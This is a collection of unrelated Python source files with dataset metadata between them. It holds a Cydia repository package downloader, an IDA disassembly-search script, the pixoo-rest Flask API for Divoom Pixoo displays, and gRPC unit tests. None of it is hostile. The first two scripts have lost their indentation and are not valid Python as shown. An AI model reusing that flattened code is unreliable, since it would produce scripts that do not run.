        default_debs += debs
    return default_debs
def is_need_by_search_string(deb, contained_str):
name = deb['Name']
package = deb['Package']
description = ''
if deb.has_key('Description'):
description = deb['Description']
if contained_str in description:
return True
if contained_str in name or contained_str in package:
return True
return False
def download_deb_file(repo_url, deb):
deb_download_url = repo_url + "/./" + deb['Filename']
save_path = "./" + deb['Package'] + "_"+ deb['Version'] + ".deb"
r = http_get(deb_download_url)
deb_data = r.content
with open(save_path, 'wb') as f:
f.write(deb_data)
# wget.download(deb_download_url, save_path)
def list_all_repo_deb(debs):
print("-"*(3+30+30+4))
title = "Developed By xia0@2019 Blog:https://4ch12dy.site"
print("|"+format(title,"^65")+"|")
print("-"*(3+30+30+4))
total_str = "Total:{}".format(len(debs))
print("|"+format(total_str,"^65")+"|")
print("-"*(3+30+30+4))
print("|"+format("N", "^3") + "|" + format("package", "^30")+"|"+format("name", "^30")+"|")
print("-"*(3+30+30+4))
for i in range(len(debs)):
if (i+1) % 40 == 0:
print("|"+format(i,"<3")+"|" + format(debs[i]["Package"], "^30")+ "|" + format(debs[i]["Name"]+"("+debs[i]["Version"]+")", "^30") + "|")
print("-"*(3+30+30+4))
choice = raw_input("|" + "do you want to continue?[Y/N]: ")
print("-"*(3+30+30+4))
if choice == 'N' or choice == 'n':
break
elif choice == 'Y' or choice == 'y':
continue
else:
print("[-] error choice")
exit(1)
print("|"+format(i,"<3")+"|" + format(debs[i]["Package"], "^30")+ "|" + format(debs[i]["Name"], "^30") + "|")
print("-"*(3+30+30+4))
def list_deb(debs):
com_item_wid = 30
total_wid = 1+3+ (com_item_wid +1) *3 + 1
print("-"*total_wid)
print("|"+format("N", "^3") + "|" + format("package", "^30")+"|"+format("name", "^30")+"|"+format("repo url", "^30")+"|")
print("-"*total_wid)
for i in range(len(debs)):
print("|"+format(i,"<3")+"|" + format(debs[i]["Package"], "^30")+ "|" + format(debs[i]["Name"]+"("+debs[i]["Version"]+")", "^30") + "|" + format(debs[i]["repo"]["url"], "^30") + "|")
print("-"*total_wid)
def generate_option_parser():
usage = "[usage]: cydiarepor [cydiarepo_url, -d] [-s <search_string>, -l]"
parser = optparse.OptionParser(usage=usage, prog="lookup")
parser.add_option("-l", "--list",
action="store_true",
default=None,
dest="listdeb",
help="list all deb package of cydia repo")
parser.add_option("-s", "--string",
action="store",
default=None,
dest="searchstring",
help="search deb by string")
parser.add_option("-d", "--default",
action="store_true",
default=None,
dest="defaultrepos",
help="search deb by string in default repos")
return parser
if __name__ == "__main__":
cydiarepoURL = ''
parser = generate_option_parser()
command_args = sys.argv[1:]
if len(command_args) == 0:
print(parser.usage)
exit(1)
try:
(options, args) = parser.parse_args(command_args)
except:
print(parser.usage)
exit(1)
if options.defaultrepos:
if options.searchstring:
need_debs = []
search_string = options.searchstring
debs = get_debs_in_default_cydia_repo()
for deb in debs:
if is_need_by_search_string(deb, search_string):
need_debs.append(deb)
list_deb(need_debs)
            num = input(">> input the number of the deb you want to download: ")
            print("[*] you chose deb {}: \"{}\"".format(num, need_debs[num]['Name']))
print("[*] start to download:{}".format(need_debs[num]['Name']))
cydiarepoURL = need_debs[num]["repo"]["url"]
download_deb_file(cydiarepoURL, need_debs[num])
print("[+] download deb done")
exit(0)
if options.listdeb:
all_defualt_debs = []
for url in get_default_cydia_repo_array():
debs = get_debs_from_cydiarepoURL(url)
all_defualt_debs += debs
list_all_repo_deb(all_defualt_debs)
exit(0)
if options.listdeb:
if len(args) != 1:
print(parser.usage)
exit(1)
cydiarepoURL = args[0]
debs = get_debs_from_cydiarepoURL(cydiarepoURL)
list_all_repo_deb(debs)
exit(0)
if options.searchstring:
if len(args) != 1:
print(parser.usage)
exit(1)
need_debs = []
search_string = options.searchstring
cydiarepoURL = args[0]
debs = get_debs_from_cydiarepoURL(cydiarepoURL)
for deb in debs:
if is_need_by_search_string(deb, search_string):
need_debs.append(deb)
list_deb(need_debs)
        num = input(">> input the number of the deb you want to download: ")
        print("[*] you chose deb {}: \"{}\"".format(num, need_debs[num]['Name']))
print("[*] start to download:{}".format(need_debs[num]['Name']))
download_deb_file(cydiarepoURL, need_debs[num])
print("[+] download deb done")
exit(0)
print("[-] you can not reach here!!!")
``` |
{
"source": "4ch12dy/xda",
"score": 3
} |
#### File: 4ch12dy/xda/search-dism-str.py
```python
from idaapi import *
import idc
import idautils
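# Walks every non-library, non-thunk function in the IDA database and prints
# the address, disassembly text and function name of each instruction whose
# disassembly contains the user-supplied search string.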
def lookup_str_in_func(func):
found = []
func_name = idc.get_func_name(func)
addrs = list(idautils.FuncItems(func)) # get list of all the address
for line in addrs:
dism = idc.generate_disasm_line(line, 0)
if input_str in dism:
find_item = hex(line)[:-1] + "\t"
find_item += dism + "\t"
find_item += func_name
found.append(find_item)
for one in found:
print(one)
print("----------------- [xda] search-dism-str ----------------")
input_str = idc.AskStr("", "String to search for:")
if not input_str or input_str == "":
print("please input the string.")
else:
for func in idautils.Functions():
flags = idc.get_func_attr(func, FUNCATTR_FLAGS)
if flags & FUNC_LIB or flags & FUNC_THUNK:
continue
lookup_str_in_func(func)
print("--------------------------------------------------------")
``` |
{
"source": "4ch1m/pixoo-rest",
"score": 2
} |
#### File: 4ch1m/pixoo-rest/app.py
```python
import os
import time
import requests
import json
import base64
from datetime import datetime
from distutils.util import strtobool
from dotenv import load_dotenv
from flask import Flask, request, redirect
from flasgger import Swagger, swag_from
from pixoo.pixoo import Channel, Pixoo
from PIL import Image
from swag import definitions
from swag import passthrough
load_dotenv()
pixoo_host = os.environ.get('PIXOO_HOST', 'Pixoo64')
pixoo_debug = os.environ.get('PIXOO_DEBUG', 'false').lower() == 'true'
while True:
try:
print(f'[ {datetime.now().strftime("%Y-%m-%d (%H:%M:%S)")} ] Trying to connect to "{pixoo_host}" ... ', end='')
if requests.get(f'http://{pixoo_host}/get').status_code == 200:
print('OK.')
break
except:
print('FAILED. (Sleeping 30 seconds.)')
time.sleep(30)
pixoo = Pixoo(
pixoo_host,
int(os.environ.get('PIXOO_SCREEN_SIZE', 64)),
pixoo_debug
)
app = Flask(__name__)
app.config['SWAGGER'] = {
'title': 'Pixoo REST',
'version': '1.0.0',
'description': 'A RESTful API to easily interact with the Wi-Fi enabled {} devices.'.format(
'<a href="https://www.divoom.com/de/products/pixoo-64">Divoom Pixoo</a>'
),
'termsOfService': ''
}
swagger = Swagger(app)
definitions.create(swagger)
def _push_immediately(_request):
    if strtobool(str(_request.form.get('push_immediately', default=True))):
pixoo.push()
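# Drawing endpoints below write into the local Pixoo buffer; the optional
# push_immediately form field decides whether that buffer is pushed to the
# device right after the operation.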
@app.route('/', methods=['GET'])
def home():
return redirect('/apidocs')
@app.route('/brightness/<int:percentage>', methods=['PUT'])
@swag_from('swag/set/brightness.yml')
def brightness(percentage):
pixoo.set_brightness(percentage)
return 'OK'
@app.route('/channel/<int:number>', methods=['PUT'])
@app.route('/face/<int:number>', methods=['PUT'])
@app.route('/visualizer/<int:number>', methods=['PUT'])
@app.route('/clock/<int:number>', methods=['PUT'])
@swag_from('swag/set/generic_number.yml')
def generic_set_number(number):
if request.path.startswith('/channel'):
pixoo.set_channel(Channel(number))
elif request.path.startswith('/face'):
pixoo.set_face(number)
elif request.path.startswith('/visualizer'):
pixoo.set_visualizer(number)
elif request.path.startswith('/clock'):
pixoo.set_clock(number)
return 'OK'
@app.route('/image', methods=['POST'])
@swag_from('swag/draw/image.yml')
def image():
pixoo.draw_image_at_location(
Image.open(request.files['image'].stream),
int(request.form.get('x')),
int(request.form.get('y'))
)
_push_immediately(request)
return 'OK'
@app.route('/text', methods=['POST'])
@swag_from('swag/draw/text.yml')
def text():
pixoo.draw_text_at_location_rgb(
request.form.get('text'),
int(request.form.get('x')),
int(request.form.get('y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/fill', methods=['POST'])
@swag_from('swag/draw/fill.yml')
def fill():
pixoo.fill_rgb(
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/line', methods=['POST'])
@swag_from('swag/draw/line.yml')
def line():
pixoo.draw_line_from_start_to_stop_rgb(
int(request.form.get('start_x')),
int(request.form.get('start_y')),
int(request.form.get('stop_x')),
int(request.form.get('stop_y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/rectangle', methods=['POST'])
@swag_from('swag/draw/rectangle.yml')
def rectangle():
pixoo.draw_filled_rectangle_from_top_left_to_bottom_right_rgb(
int(request.form.get('top_left_x')),
int(request.form.get('top_left_y')),
int(request.form.get('bottom_right_x')),
int(request.form.get('bottom_right_y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/pixel', methods=['POST'])
@swag_from('swag/draw/pixel.yml')
def pixel():
pixoo.draw_pixel_at_location_rgb(
int(request.form.get('x')),
int(request.form.get('y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/character', methods=['POST'])
@swag_from('swag/draw/character.yml')
def character():
pixoo.draw_character_at_location_rgb(
request.form.get('character'),
int(request.form.get('x')),
int(request.form.get('y')),
int(request.form.get('r')),
int(request.form.get('g')),
int(request.form.get('b'))
)
_push_immediately(request)
return 'OK'
@app.route('/sendText', methods=['POST'])
@swag_from('swag/send/text.yml')
def send_text():
pixoo.send_text(
request.form.get('text'),
(int(request.form.get('x')), int(request.form.get('y'))),
(int(request.form.get('r')), int(request.form.get('g')), int(request.form.get('b'))),
(int(request.form.get('identifier'))),
(int(request.form.get('font'))),
(int(request.form.get('width'))),
(int(request.form.get('movement_speed'))),
(int(request.form.get('direction')))
)
return 'OK'
def _reset_gif():
return requests.post(f'http://{pixoo.address}/post', json.dumps({
"Command": "Draw/ResetHttpGifId"
})).json()
def _send_gif(num, offset, width, speed, data):
return requests.post(f'http://{pixoo.address}/post', json.dumps({
"Command": "Draw/SendHttpGif",
"PicID": 1,
"PicNum": num,
"PicOffset": offset,
"PicWidth": width,
"PicSpeed": speed,
"PicData": data
})).json()
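# Animated GIF upload: the device's gif id is reset once, then every frame is
# resized if needed and streamed base64-encoded via Draw/SendHttpGif with its
# offset and the total frame count; single-frame images just go through the
# normal draw buffer.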
@app.route('/sendGif', methods=['POST'])
@swag_from('swag/send/gif.yml')
def send_gif():
gif = Image.open(request.files['gif'].stream)
speed = int(request.form.get('speed'))
if gif.is_animated:
_reset_gif()
for i in range(gif.n_frames):
gif.seek(i)
if gif.size not in ((16, 16), (32, 32), (64, 64)):
gif_frame = gif.resize((pixoo.size, pixoo.size)).convert("RGB")
else:
gif_frame = gif.convert("RGB")
_send_gif(
gif.n_frames,
i,
gif_frame.width,
speed,
base64.b64encode(gif_frame.tobytes()).decode("utf-8")
)
else:
pixoo.draw_image(gif)
pixoo.push()
return 'OK'
passthrough_routes = {
# channel ...
'/passthrough/channel/setIndex': passthrough.create(*passthrough.channel_set_index),
'/passthrough/channel/setCustomPageIndex': passthrough.create(*passthrough.channel_set_custom_page_index),
'/passthrough/channel/setEqPosition': passthrough.create(*passthrough.channel_set_eq_position),
'/passthrough/channel/cloudIndex': passthrough.create(*passthrough.channel_cloud_index),
'/passthrough/channel/getIndex': passthrough.create(*passthrough.channel_get_index),
'/passthrough/channel/setBrightness': passthrough.create(*passthrough.channel_set_brightness),
'/passthrough/channel/getAllConf': passthrough.create(*passthrough.channel_get_all_conf),
'/passthrough/channel/onOffScreen': passthrough.create(*passthrough.channel_on_off_screen),
# sys ...
'/passthrough/sys/logAndLat': passthrough.create(*passthrough.sys_log_and_lat),
'/passthrough/sys/timeZone': passthrough.create(*passthrough.sys_timezone),
# device ...
'/passthrough/device/setUTC': passthrough.create(*passthrough.device_set_utc),
# tools ...
'/passthrough/tools/setTimer': passthrough.create(*passthrough.tools_set_timer),
'/passthrough/tools/setStopWatch': passthrough.create(*passthrough.tools_set_stop_watch),
'/passthrough/tools/setScoreBoard': passthrough.create(*passthrough.tools_set_score_board),
'/passthrough/tools/setNoiseStatus': passthrough.create(*passthrough.tools_set_noise_status),
# draw ...
'/passthrough/draw/sendHttpText': passthrough.create(*passthrough.draw_send_http_text),
'/passthrough/draw/clearHttpText': passthrough.create(*passthrough.draw_clear_http_text),
'/passthrough/draw/sendHttpGif': passthrough.create(*passthrough.draw_send_http_gif),
'/passthrough/draw/resetHttpGifId': passthrough.create(*passthrough.draw_reset_http_gif_id),
}
def _passthrough_request(passthrough_request):
return requests.post(f'http://{pixoo.address}/post', json.dumps(passthrough_request.json)).json()
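# The loop below generates one Flask POST endpoint per passthrough route via
# exec(); each generated view simply forwards its JSON body unchanged to the
# device's /post API.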
for _route, _swag in passthrough_routes.items():
exec(f"""
@app.route('{_route}', methods=['POST'], endpoint='{_route}')
@swag_from({_swag}, endpoint='{_route}')
def passthrough_{list(passthrough_routes.keys()).index(_route)}():
return _passthrough_request(request)
""")
if __name__ == '__main__':
app.run()
```
#### File: pixoo-rest/swag/definitions.py
```python
def create(swagger):
@swagger.definition('form_param_x')
class FormParamX:
"""
Horizontal pixel position.
---
name: x
in: formData
type: integer
minimum: '0'
default: '0'
required: true
"""
@swagger.definition('form_param_y')
class FormParamY:
"""
Vertical pixel position.
---
name: y
in: formData
type: integer
minimum: '0'
default: '0'
required: true
"""
@swagger.definition('form_param_r')
class FormParamR:
"""
RGB - Red color value.
---
name: r
in: formData
type: integer
minimum: '0'
maximum: 255
default: 255
required: true
"""
@swagger.definition('form_param_g')
class FormParamG:
"""
RGB - Green color value.
---
name: g
in: formData
type: integer
minimum: '0'
maximum: 255
default: 255
required: true
"""
@swagger.definition('form_param_b')
class FormParamB:
"""
RGB - Blue color value.
---
name: b
in: formData
type: integer
minimum: '0'
maximum: 255
default: 255
required: true
"""
@swagger.definition('form_param_push_immediately')
class FormParamPushImmediately:
"""
Push draw buffer to the device immediately after this operation?
---
name: push_immediately
in: formData
type: boolean
default: true
required: true
"""
``` |
{
"source": "4CodersColombia/firesql",
"score": 3
} |
#### File: firesql/firesql/__init__.py
```python
import datetime
from typing import Any
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy import create_engine, MetaData, engine
from sqlalchemy import Column, Integer, String, DateTime, Boolean, Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql.functions import mode
from sqlalchemy.sql.schema import ForeignKey
import os
from functools import reduce
class Float(Float):
pass
class Column(Column):
pass
class Integer(Integer):
pass
class String(String):
pass
class DateTime(DateTime):
pass
class Boolean(Boolean):
pass
class ForeignKey(ForeignKey):
pass
class FiresqlBase():
def begin(self):
return declarative_base()
or_ = sqlalchemy.sql.or_
and_ = sqlalchemy.sql.and_
class dotdict(dict):
"""dot.notation access to dictionary attributes"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
class NewSesion(sessionmaker):
    def add(self, instance):
        super().begin_nested()
        super().add(instance)
    def commit(self):
        super().commit()
    def close(self):
        super().close()
    def delete(self, instance):
        super().delete(instance)
    def rollback(self):
        super().rollback()
    def query(self, *args):
        return super().query(*args)
class ErrorGetData(Exception):
pass
class ErrorFilterData(Exception):
def __init__(self, value):
message = f"Got an incorrect filter list {value}"
super().__init__(message)
class FilterSingledRead():
value: Any
type: str
name: str
def __init__(self, my_dict, name):
self.name = name
for key in my_dict:
setattr(self, key, my_dict[key])
class Firesql(object):
conn: engine
def connect_sql(self, host_name: str, user_name: str, user_password: str, db_name: str, port=3306):
try:
self.conn = create_engine(
f"mysql+pymysql://{user_name}:{user_password}@{host_name}:{port}/{db_name}")
            # Set environment variables
            os.environ['DATABASE_URL'] = f"mysql+pymysql://{user_name}:{user_password}@{host_name}:{port}/{db_name}"
self.metadata = MetaData(self.conn)
print("Connection to MySQL DB successful")
except Exception as e:
print(f"The error '{e}' occurred")
def create_all(self, base):
base.metadata.create_all(self.conn)
def drop_all(self, base):
base.metadata.drop_all(self.conn)
def session(self):
Sess = NewSesion(bind=self.conn)
session: NewSesion = Sess()
return session
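    # Paginated read helper: applies the optional dict/expression filters and
    # ordering, returns (rows, total_count); with type_class=False the rows are
    # returned as plain dicts with datetimes rendered as strings.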
def singled_read(
self,
model,
page=0,
page_size=50,
filters=None,
type_class=True,
data_filter: dict = {},
or_join=False,
order_by=None,
ascendent=True,
):
session = self.session()
query = session.query(model)
if data_filter:
filter_data = self.validate_data_singled_read(
model, data_filter, or_join)
query = query.filter(filter_data)
if filters is not None:
query = query.filter(filters)
total_count = query.count()
if order_by is not None:
order = getattr(model, order_by).asc(
) if ascendent else getattr(model, order_by).desc()
query = query.order_by(order)
if page_size > 0:
query = query.limit(page_size)
if page > 0:
query = query.offset(page * page_size)
data: list[type[model]] = query.all()
if not type_class:
list_data = list(map(lambda x: x.__dict__, data))
return list(map(self.iterdict, list_data)), total_count
return data, total_count
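    # data_filter maps column names to {"type": ..., "value": ...} entries,
    # for example (illustrative, assuming `name` and `age` columns exist):
    #   {"name": {"type": "like", "value": "foo"},
    #    "age": {"type": "higher", "value": 18}}
    # Supported types below are like, equal, higher and lowwer (sic); entries
    # are combined with AND unless or_join is set.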
def validate_data_singled_read(self, model, filter_data: dict, or_join=False):
values_in_model = dir(model)
get_filter_data = list(filter_data.keys())
if not set(get_filter_data).issubset(set(values_in_model)):
raise ErrorFilterData(get_filter_data)
filter = []
def get_filter(filter, type: str, value):
if type == 'like':
return getattr(filter, 'ilike')("%{}%".format(value))
elif type == 'equal':
return filter == value
elif type == 'higher':
return filter > value
elif type == 'lowwer':
return filter < value
else:
return None
for key in filter_data.keys():
new_filter_data = FilterSingledRead(filter_data[key], key)
new_filter = getattr(model, new_filter_data.name)
filter_type = get_filter(
new_filter, new_filter_data.type, new_filter_data.value)
if filter_type is not None:
filter.append(filter_type)
if or_join:
return or_(*filter)
return and_(*filter)
def iterdict(self, d):
for k, v in d.items():
if isinstance(v, dict):
self.iterdict(v)
else:
if type(v) == datetime.datetime:
v = str(v)
d.update({k: v})
return d
``` |
{
"source": "4con/grpc-win-xp",
"score": 2
} |
#### File: unit/_cython/_channel_test.py
```python
import time
import threading
import unittest
from grpc._cython import cygrpc
from tests.unit.framework.common import test_constants
def _channel_and_completion_queue():
channel = cygrpc.Channel(b'localhost:54321', ())
completion_queue = cygrpc.CompletionQueue()
return channel, completion_queue
def _connectivity_loop(channel, completion_queue):
for _ in range(100):
connectivity = channel.check_connectivity_state(True)
channel.watch_connectivity_state(connectivity,
time.time() + 0.2, completion_queue,
None)
completion_queue.poll()
def _create_loop_destroy():
channel, completion_queue = _channel_and_completion_queue()
_connectivity_loop(channel, completion_queue)
completion_queue.shutdown()
def _in_parallel(behavior, arguments):
threads = tuple(
threading.Thread(target=behavior, args=arguments)
for _ in range(test_constants.THREAD_CONCURRENCY))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
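# The tests below run the connectivity watch loop from THREAD_CONCURRENCY
# threads at once, first against a single shared channel and then with one
# channel per thread, to exercise thread safety of the Cython layer.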
class ChannelTest(unittest.TestCase):
def test_single_channel_lonely_connectivity(self):
channel, completion_queue = _channel_and_completion_queue()
_in_parallel(_connectivity_loop, (
channel,
completion_queue,
))
completion_queue.shutdown()
def test_multiple_channels_lonely_connectivity(self):
_in_parallel(_create_loop_destroy, ())
if __name__ == '__main__':
unittest.main(verbosity=2)
```
#### File: interfaces/face/_blocking_invocation_inline_service.py
```python
from __future__ import division
import abc
import itertools
import unittest
from concurrent import futures
import six
# test_interfaces is referenced from specification in this module.
from grpc.framework.foundation import logging_pool
from grpc.framework.interfaces.face import face
from tests.unit.framework.common import test_constants
from tests.unit.framework.common import test_control
from tests.unit.framework.common import test_coverage
from tests.unit.framework.interfaces.face import _3069_test_constant
from tests.unit.framework.interfaces.face import _digest
from tests.unit.framework.interfaces.face import _stock_service
from tests.unit.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
class TestCase(
six.with_metaclass(abc.ABCMeta, test_coverage.Coverage,
unittest.TestCase)):
"""A test of the Face layer of RPC Framework.
Concrete subclasses must have an "implementation" attribute of type
test_interfaces.Implementation and an "invoker_constructor" attribute of type
_invocation.InvokerConstructor.
"""
NAME = 'BlockingInvocationInlineServiceTest'
def setUp(self):
"""See unittest.TestCase.setUp for full specification.
Overriding implementations must call this implementation.
"""
self._control = test_control.PauseFailControl()
self._digest = _digest.digest(_stock_service.STOCK_TEST_SERVICE,
self._control, None)
generic_stub, dynamic_stubs, self._memo = self.implementation.instantiate(
self._digest.methods, self._digest.inline_method_implementations,
None)
self._invoker = self.invoker_constructor.construct_invoker(
generic_stub, dynamic_stubs, self._digest.methods)
def tearDown(self):
"""See unittest.TestCase.tearDown for full specification.
Overriding implementations must call this implementation.
"""
self._invoker = None
self.implementation.destantiate(self._memo)
def testSuccessfulUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
response, call = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT, with_call=True)
test_messages.verify(request, response, self)
def testSuccessfulUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_stream_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(request, responses, self)
def testSuccessfulStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response, call = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT, with_call=True)
test_messages.verify(requests, response, self)
def testSuccessfulStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_stream_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
responses = list(response_iterator)
test_messages.verify(requests, responses, self)
def testSequentialInvocations(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
first_request = test_messages.request()
second_request = test_messages.request()
first_response = self._invoker.blocking(group, method)(
first_request, test_constants.LONG_TIMEOUT)
test_messages.verify(first_request, first_response, self)
second_response = self._invoker.blocking(group, method)(
second_request, test_constants.LONG_TIMEOUT)
test_messages.verify(second_request, second_response, self)
def testParallelInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = []
response_futures = []
for _ in range(test_constants.THREAD_CONCURRENCY):
request = test_messages.request()
response_future = pool.submit(
self._invoker.blocking(group, method), request,
test_constants.LONG_TIMEOUT)
requests.append(request)
response_futures.append(response_future)
responses = [
response_future.result()
for response_future in response_futures
]
for request, response in zip(requests, responses):
test_messages.verify(request, response, self)
pool.shutdown(wait=True)
def testWaitingForSomeButNotAllParallelInvocations(self):
pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = []
response_futures_to_indices = {}
for index in range(test_constants.THREAD_CONCURRENCY):
request = test_messages.request()
response_future = pool.submit(
self._invoker.blocking(group, method), request,
test_constants.LONG_TIMEOUT)
requests.append(request)
response_futures_to_indices[response_future] = index
some_completed_response_futures_iterator = itertools.islice(
futures.as_completed(response_futures_to_indices),
test_constants.THREAD_CONCURRENCY // 2)
for response_future in some_completed_response_futures_iterator:
index = response_futures_to_indices[response_future]
test_messages.verify(requests[index],
response_future.result(), self)
pool.shutdown(wait=True)
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledUnaryRequestStreamResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestUnaryResponse(self):
raise NotImplementedError()
@unittest.skip('Cancellation impossible with blocking control flow!')
def testCancelledStreamRequestStreamResponse(self):
raise NotImplementedError()
def testExpiredUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(group, method)(
request, _3069_test_constant.REALLY_SHORT_TIMEOUT)
def testExpiredUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_stream_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(group, method)(
request, _3069_test_constant.REALLY_SHORT_TIMEOUT)
list(response_iterator)
def testExpiredStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
self._invoker.blocking(
group, method)(iter(requests),
_3069_test_constant.REALLY_SHORT_TIMEOUT)
def testExpiredStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_stream_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.pause(), self.assertRaises(
face.ExpirationError):
response_iterator = self._invoker.blocking(
group, method)(iter(requests),
_3069_test_constant.REALLY_SHORT_TIMEOUT)
list(response_iterator)
def testFailedUnaryRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_unary_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
def testFailedUnaryRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.unary_stream_messages_sequences)):
for test_messages in test_messages_sequence:
request = test_messages.request()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
request, test_constants.LONG_TIMEOUT)
list(response_iterator)
def testFailedStreamRequestUnaryResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_unary_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
def testFailedStreamRequestStreamResponse(self):
for (group, method), test_messages_sequence in (six.iteritems(
self._digest.stream_stream_messages_sequences)):
for test_messages in test_messages_sequence:
requests = test_messages.requests()
with self._control.fail(), self.assertRaises(face.RemoteError):
response_iterator = self._invoker.blocking(group, method)(
iter(requests), test_constants.LONG_TIMEOUT)
list(response_iterator)
```
#### File: interfaces/face/test_cases.py
```python
import unittest # pylint: disable=unused-import
# test_interfaces is referenced from specification in this module.
from tests.unit.framework.interfaces.face import _blocking_invocation_inline_service
from tests.unit.framework.interfaces.face import _future_invocation_asynchronous_event_service
from tests.unit.framework.interfaces.face import _invocation
from tests.unit.framework.interfaces.face import test_interfaces # pylint: disable=unused-import
_TEST_CASE_SUPERCLASSES = (
_blocking_invocation_inline_service.TestCase,
_future_invocation_asynchronous_event_service.TestCase,
)
def test_cases(implementation):
"""Creates unittest.TestCase classes for a given Face layer implementation.
Args:
implementation: A test_interfaces.Implementation specifying creation and
destruction of a given Face layer implementation.
Returns:
A sequence of subclasses of unittest.TestCase defining tests of the
specified Face layer implementation.
"""
test_case_classes = []
for invoker_constructor in _invocation.invoker_constructors():
for super_class in _TEST_CASE_SUPERCLASSES:
test_case_classes.append(
type(
invoker_constructor.name() + super_class.NAME,
(super_class,), {
'implementation': implementation,
'invoker_constructor': invoker_constructor,
'__module__': implementation.__module__,
}))
return test_case_classes
```
#### File: tests/unit/_rpc_test.py
```python
import itertools
import threading
import unittest
from concurrent import futures
import grpc
from grpc.framework.foundation import logging_pool
from tests.unit import test_common
from tests.unit.framework.common import test_constants
from tests.unit.framework.common import test_control
_SERIALIZE_REQUEST = lambda bytestring: bytestring * 2
_DESERIALIZE_REQUEST = lambda bytestring: bytestring[len(bytestring) // 2:]
_SERIALIZE_RESPONSE = lambda bytestring: bytestring * 3
_DESERIALIZE_RESPONSE = lambda bytestring: bytestring[:len(bytestring) // 3]
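# Each serializer/deserializer pair round-trips: requests are doubled and the
# matching half kept, responses are tripled and the first third kept, so the
# payload bytes survive a full RPC unchanged.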
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
class _Callback(object):
def __init__(self):
self._condition = threading.Condition()
self._value = None
self._called = False
def __call__(self, value):
with self._condition:
self._value = value
self._called = True
self._condition.notify_all()
def value(self):
with self._condition:
while not self._called:
self._condition.wait()
return self._value
class _Handler(object):
def __init__(self, control):
self._control = control
def handle_unary_unary(self, request, servicer_context):
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
'testkey',
'testvalue',
),))
# TODO(https://github.com/grpc/grpc/issues/8483): test the values
# returned by these methods rather than only "smoke" testing that
# the return after having been called.
servicer_context.is_active()
servicer_context.time_remaining()
return request
def handle_unary_stream(self, request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH):
self._control.control()
yield request
self._control.control()
if servicer_context is not None:
servicer_context.set_trailing_metadata(((
